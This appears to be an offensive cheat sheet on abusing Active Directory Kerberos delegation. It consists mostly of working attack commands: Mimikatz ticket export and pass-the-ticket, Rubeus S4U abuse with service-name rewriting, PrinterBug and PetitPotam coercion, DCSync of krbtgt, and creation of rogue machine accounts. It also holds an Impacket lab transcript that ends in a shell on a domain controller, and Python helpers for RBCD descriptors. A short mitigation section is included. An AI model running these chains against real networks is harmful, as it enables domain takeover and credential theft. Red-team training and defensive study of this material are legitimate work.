ADeleginator
NXC
nxc ldap 192.168.56.11 -u eddard.stark -p 'FightP3aceAndHonor!' --find-delegation
https://x.com/al3x_n3ff/status/1857153795949559875?t=3iN0A-aTMN58zD0O7rIIlA&s=03
SharpADWS
Unconstrained Delegation
Unconstrained Delegation: when a user authenticates to a server trusted for unconstrained delegation, the KDC includes a forwarded copy of the user's TGT in the service ticket and the server caches it in LSASS. Whoever controls that server can reuse the cached TGT to request tickets to any service on any computer in the domain as that user.
Discovery
Get-DomainComputer -Unconstrained
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
Domain Controllers are trusted for unconstrained delegation by default, so filter them out of the results; any other computer (or user) returned is a target.
Compromise the server where unconstrained delegation is enabled
Wait for a DA to connect, then export the cached tickets
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Reuse the DA TGT
Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\[****]-*****-Administrator@krbtgt-DOMAIN.LOCAL.kirbi"'
Rather than waiting, coerce a high-privilege principal (typically the DC's machine account) into authenticating to the unconstrained host: Printer Bug (MS-RPRN), PetitPotam and similar coercion primitives.
Printerbug also works across a two-way forest trust when TGT delegation is enabled on the trust - see Trusts
Capture the TGT of dc$
On the victim (unconstrained) server, watch for incoming tickets with Rubeus:
Rubeus.exe monitor /interval:5 /nowrap
Printerbug - run MS-RPRN.exe (first argument is the DC to coerce, second is the host it must authenticate to)
MS-RPRN.exe \\dc.domain.local \\victim.domain.local
# Victim host
Rubeus.exe monitor /interval:5 /nowrap
Or with PetitPotam (listener first, then the DC to coerce)
.\PetitPotam.exe victim.domain.local dc.domain.local
# Victim host
Rubeus.exe monitor /interval:5 /nowrap
On Linux, use Coercer
ShadowCoerce or DFSCoerce can also be used
Copy the base64-encoded TGT from the monitor output, strip any whitespace, and inject it:
Rubeus.exe ptt /ticket:<Base64>
Or write it to a .kirbi and use Invoke-Mimikatz:
[IO.File]::WriteAllBytes("C:\AD\Tools\USDC.kirbi", [Convert]::FromBase64String("ticket_from_Rubeus_monitor"))
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\USDC.kirbi"'
With the DC machine account's TGT in the session, run DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
Mitigation
The following security controls should be implemented to mitigate unconstrained delegation:
Ensure computer objects are not configured for unconstrained delegation. If delegation is required for a computer object, use resource-based constrained delegation instead.
Ensure privileged user objects are configured as ‘sensitive and cannot be delegated’. This can be configured by using the ‘Account is sensitive and cannot be delegated’ option on the user object in Active Directory Users and Computers.
Disable the Print Spooler service on Domain Controllers. This prevents the Print Spooler service from being used to coerce a Domain Controller into authenticating to another system.
https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03
Constrained Delegation - Protocol Transition
Constrained Delegation: the first-hop server can only obtain tickets to the services listed in its msDS-AllowedToDelegateTo attribute
Service for User (S4U) extensions are used to impersonate a user:
S4U2self: lets a service request a service ticket to itself on behalf of any user, without that user ever authenticating. The ticket is forwardable only when the account has TRUSTED_TO_AUTH_FOR_DELEGATION set (protocol transition).
S4U2proxy: lets the service use that forwardable ticket to obtain a service ticket to a second service on behalf of the user. The permitted targets are the SPNs listed in msDS-AllowedToDelegateTo.
Discovery
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
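The discovery queries for unconstrained delegation (TrustedForDelegation), constrained delegation (TrustedToAuth, msDS-AllowedToDelegateTo) and the "sensitive and cannot be delegated" mitigation all reduce to a few userAccountControl bits plus two attributes. The script below is an added example, not code from the page, PowerView, the AD module or nxc: it applies those same tests to attribute dictionaries (as returned by any LDAP client) so the logic can be run and checked offline. The SAMPLE objects are constructed; the flag values are the documented userAccountControl bits.

```python
"""Delegation discovery applied to AD attribute dictionaries, offline.

Added example, not code from the original page, PowerView, the AD module or
nxc. Same checks as Get-ADComputer/Get-ADUser -Filter {TrustedForDelegation
-eq $True}, Get-DomainUser -TrustedToAuth and the msDS-AllowedToDelegateTo
query, applied to plain dicts. SAMPLE is constructed data.
"""

UF_WORKSTATION_TRUST_ACCOUNT = 0x00001000       # member server / workstation
UF_SERVER_TRUST_ACCOUNT = 0x00002000            # domain controller
UF_TRUSTED_FOR_DELEGATION = 0x00080000          # TrustedForDelegation: unconstrained
UF_NOT_DELEGATED = 0x00100000                   # "Account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000  # TrustedToAuthForDelegation: protocol transition


def spn_host(spn):
    """'CIFS/mssql.domain.LOCAL:445' -> 'mssql.domain.local'."""
    return spn.split("/", 1)[1].split(":", 1)[0].lower()


def classify(obj):
    """Describe one object's delegation configuration."""
    uac = int(obj.get("userAccountControl", 0))
    targets = list(obj.get("msDS-AllowedToDelegateTo", []))
    kinds = []
    if uac & UF_TRUSTED_FOR_DELEGATION:
        kinds.append("unconstrained")
    if targets:
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            kinds.append("constrained-protocol-transition")
        else:
            kinds.append("constrained-kerberos-only")
    if obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        kinds.append("rbcd-target")
    return {
        "name": obj["sAMAccountName"],
        "kinds": kinds,
        "is_dc": bool(uac & UF_SERVER_TRUST_ACCOUNT),
        "sensitive": bool(uac & UF_NOT_DELEGATED),
        # The KDC does not check the service class of the delegated SPN
        # (Rubeus /altservice), so the reachable set is a set of hosts, not SPNs.
        "hosts": sorted({spn_host(s) for s in targets if "/" in s}),
    }


def find_delegation(objects, skip_dcs=True):
    """Return the objects worth looking at, like nxc --find-delegation."""
    findings = []
    for obj in objects:
        c = classify(obj)
        if not c["kinds"]:
            continue
        # DCs are unconstrained by design; only report them if asked to.
        if skip_dcs and c["is_dc"] and c["kinds"] == ["unconstrained"]:
            continue
        findings.append(c)
    return findings


# Constructed sample directory, not real data.
SAMPLE = [
    {"sAMAccountName": "DC$", "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "APPSRV$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "appsvc", "userAccountControl": 0x200 | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["CIFS/mssql.domain.LOCAL"]},
    {"sAMAccountName": "WEB$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["time/dc.domain.LOCAL", "ldap/dc.domain.LOCAL"]},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200 | UF_NOT_DELEGATED},
    {"sAMAccountName": "VICTIM$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80"},
]

if __name__ == "__main__":
    for f in find_delegation(SAMPLE):
        print(f["name"], f["kinds"], f["hosts"], "sensitive" if f["sensitive"] else "")
```

The "hosts" field is the practical output: WEB$ is only allowed time/dc.domain.LOCAL, but since the service class is not validated that is effectively every service on the DC, which is why the DCSync chain further down works through an ldap ticket obtained with /altservice.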
Abusing with kekeo
The password, or the NTLM/AES key, of the delegating account is required
kekeo # tgt::ask /user:victim_user /domain:domain.local /rc4:<ntlm_hash>
kekeo # tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL
Request tickets for several services of the same host in one go (the service class is not validated by the KDC):
kekeo # tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL|HTTP/mssql.domain.LOCAL
Invoke-Mimikatz -Command '"kerberos::ptt <tgs_from_step_2>.kirbi"'
ls \\mssql.domain.local\c$
Invoke-Command -ScriptBlock {whoami} -ComputerName mssql.domain.local
Abusing with Rubeus
Request TGT and TGS in a single command
Rubeus.exe s4u /user:victim_user /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:CIFS/mssql.domain.LOCAL /ptt
ls \\mssql.domain.local\c$
The service name in the returned ticket is neither validated by the KDC nor covered by the ticket's encryption, so delegation to one SPN of a host effectively grants access to every service running under that host's account (CIFS becomes HTTP, LDAP, ...). Rubeus rewrites the service class with /altservice.
With rc4
Rubeus.exe s4u /user:appsvc /rc4:<ntlm_hash> /impersonateuser:administrator /msdsspn:CIFS/mssql.domain.local /altservice:HTTP /domain:domain.local /ptt
winrs -r:mssql.domain.local cmd.exe
Abusing with kekeo
The password, or the NTLM/AES key, of the delegating machine account is required
kekeo # tgt::ask /user:victim_machine_account$ /domain:domain.local /rc4:<ntlm_hash>
kekeo # tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:time/dc.domain.LOCAL|ldap/dc.domain.LOCAL
Invoke-Mimikatz -Command '"kerberos::ptt <tgs_from_step_2>.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
Abusing with Rubeus
Request TGT and TGS in a single command; delegation to time/dc is enough, the LDAP ticket needed for DCSync comes from /altservice
Rubeus.exe s4u /user:victim_machine_account$ /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:time/dc.domain.LOCAL /altservice:ldap /ptt
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"
Persistence - msDS-AllowedToDelegateTo
Resource-based Constrained Delegation
Instead of a list of SPNs in msDS-AllowedToDelegateTo on the front-end service, access is controlled by a security descriptor stored in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute (exposed as PrincipalsAllowedToDelegateToAccount) of the resource/back-end service.
The administrator of the resource can configure this delegation themselves, whereas the other delegation types require the SeEnableDelegationPrivilege, held by default only by Domain Admins.
Two things are needed to abuse RBCD:
Write permission over the target computer object (specifically over msDS-AllowedToActOnBehalfOfOtherIdentity)
Control over an object that has an SPN configured, e.g. admin access to a domain-joined machine, or the ability to join a machine to the domain (ms-DS-MachineAccountQuota is 10 by default)
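Because the attribute is a raw security descriptor, it helps to see what Set-ADComputer -PrincipalsAllowedToDelegateToAccount (or impacket's rbcd.py) actually writes and how to read it back when enumerating existing RBCD targets. The code below is an added example, not code from the page, impacket or the AD module: build_rbcd_sd() emits a self-relative descriptor with one ACCESS_ALLOWED_ACE per principal (owner/group BUILTIN\Administrators, ACL revision 4, mask 0xF01FF, the same values rbcd.py uses), and parse_rbcd_sd() decodes one. The SIDs are constructed.

```python
"""Build and parse msDS-AllowedToActOnBehalfOfOtherIdentity (MS-DTYP 2.4.6 self-relative SD).

Added example, not code from the original page, impacket or the AD module.
SIDs used below are constructed.
"""
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 4
FULL_CONTROL = 0x000F01FF
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"
SD_HEADER = "<BBHIIII"   # Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
ACL_HEADER = "<BBHHH"    # AclRevision, Sbz1, AclSize, AceCount, Sbz2
ACE_HEADER = "<BBH"      # AceType, AceFlags, AceSize


def sid_to_bytes(sid):
    """'S-1-5-21-1-2-3-1105' -> binary SID: revision, sub-auth count, 6-byte authority, sub-auths."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string: %r" % sid)
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf, off):
    """Parse a binary SID at buf[off:]; return (sid_string, end_offset)."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(map(str, subs))), off + 8 + 4 * count


def build_rbcd_sd(allowed_sids):
    """Descriptor whose DACL allows each SID to act on behalf of other identities."""
    owner = group = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    aces = b""
    for sid in allowed_sids:
        sid_bytes = sid_to_bytes(sid)
        ace_size = struct.calcsize(ACE_HEADER) + 4 + len(sid_bytes)   # header + mask + SID
        aces += struct.pack(ACE_HEADER, ACCESS_ALLOWED_ACE_TYPE, 0, ace_size)
        aces += struct.pack("<I", FULL_CONTROL) + sid_bytes
    acl = struct.pack(ACL_HEADER, ACL_REVISION_DS, 0,
                      struct.calcsize(ACL_HEADER) + len(aces), len(allowed_sids), 0) + aces
    off_owner = struct.calcsize(SD_HEADER)
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)
    header = struct.pack(SD_HEADER, 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)   # no SACL
    return header + owner + group + acl


def parse_rbcd_sd(buf):
    """Return [(sid, access_mask)] for every ACCESS_ALLOWED_ACE in the DACL."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from(SD_HEADER, buf, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []   # no DACL to enumerate
    _, _, _, ace_count, _ = struct.unpack_from(ACL_HEADER, buf, off_dacl)
    pos = off_dacl + struct.calcsize(ACL_HEADER)
    allowed = []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from(ACE_HEADER, buf, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            mask, = struct.unpack_from("<I", buf, pos + 4)
            sid, _ = bytes_to_sid(buf, pos + 8)
            allowed.append((sid, mask))
        pos += ace_size   # other ACE types are skipped by their declared size
    return allowed


if __name__ == "__main__":
    # Constructed SID standing in for an attacker-controlled computer account (computer1$).
    sd = build_rbcd_sd(["S-1-5-21-1111111111-2222222222-3333333333-1105"])
    print(len(sd), "bytes:", sd.hex())
    print(parse_rbcd_sd(sd))
```

For enumeration, feed parse_rbcd_sd() the raw attribute bytes from LDAP and resolve the returned SIDs; any principal you control in that list is an RBCD path to the computer. Note the first four bytes of a freshly written value are always 01 00 04 80 (revision 1, control DACL_PRESENT|SELF_RELATIVE), a handy fingerprint when grepping LDAP dumps.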
Write Permission
Find-InterestingDomainACL | ? { $_.IdentityReferenceName -match 'username' }
Exploit
Configure RBCD
$comps = 'computer1$', 'computer2$'
Set-ADComputer -Identity victim -PrincipalsAllowedToDelegateToAccount $comps
Extract the AES keys of computer1$ (requires local admin on that machine)
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
Use the AES key to access victim as any user we want
Rubeus.exe s4u /user:computer1$ /aes256:<aes_key> /msdsspn:http/victim /impersonateuser:administrator /ptt
winrs -r:victim cmd.exe
With Impacket
In this transcript L.BIANCHI_ADM is a Domain Admin. SVC_LDAP is added to the DELEGATEDADMINS group (the principal that carries the delegation right here), is given an SPN because S4U2self only works for accounts with at least one SPN, and is then used to impersonate L.BIANCHI_ADM against CIFS on the DC.
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ ./bloodyAD.py --host dc01.domain.htb --dc-ip 10.10.11.45 -d "DOMAIN.HTB" -u user -p 'password' -k add groupMember "DELEGATEDADMINS" "SVC_LDAP"
[+] SVC_LDAP added to DELEGATEDADMINS
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ ./bloodyAD.py --host dc01.domain.htb -d "DOMAIN.HTB" --dc-ip 10.10.11.45 -k set object "SVC_LDAP" servicePrincipalName -v "cifs/fake"
[+] SVC_LDAP's servicePrincipalName has been updated
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-getTGT domain.htb/svc_ldap:password -dc-ip dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in svc_ldap.ccache
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ export KRB5CCNAME=svc_ldap.ccache
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-getST -spn 'cifs/dc01.domain.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'domain.htb/svc_ldap:password'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating L.BIANCHI_ADM
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-wmiexec -k -no-pass DOMAIN.HTB/L.BIANCHI_ADM@dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type Users\Administrator\Desktop\root.txt
Constrained Delegation - Kerberos Only
A front end configured for Kerberos-only constrained delegation (no protocol transition) can only run S4U2proxy with a forwardable ticket a user genuinely obtained by authenticating to it; its own S4U2self tickets are not forwardable. Workaround: configure RBCD on the front end towards an account we control, use that account's S4U2self + S4U2proxy to obtain a forwardable ticket to the front end as the target user, then use that ticket with the front end's key as the evidence for S4U2proxy to the back end.
Enumeration
# AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
Create a new machine account
https://github.com/Kevin-Robertson/Powermad
. .\Powermad.ps1
New-MachineAccount -MachineAccount studentcompX -Password (ConvertTo-SecureString 'P@ssword@123' -AsPlainText -Force)
Configure RBCD
# On the victim host: get a TGT as victim$, which can write its own msDS-AllowedToActOnBehalfOfOtherIdentity
Rubeus.exe asktgt /user:victim$ /aes256:<aes_key> /domain:domain.local /ptt /nowrap
# With AD Module
Set-ADComputer -Identity victim$ -PrincipalsAllowedToDelegateToAccount studentcompX$ -Verbose
Get TGS
# Hash of the new machine account's password
Rubeus.exe hash /password:P@ssword@123
Rubeus.exe s4u /impersonateuser:administrator /user:studentcompX$ /rc4:<rc4_hash> /msdsspn:cifs/victim.domain.local /nowrap
Use the forwardable TGS to victim as the evidence ticket and have victim$ request a new TGS to the back end (mssql) it is allowed to delegate to
Rubeus.exe s4u /tgs:<base64_tgs_from_previous_step> /user:victim$ /aes256:<victim$_aes> /msdsspn:cifs/mssql.domain.local /altservice:http /nowrap /ptt
winrs -r:mssql.domain.local cmd.exe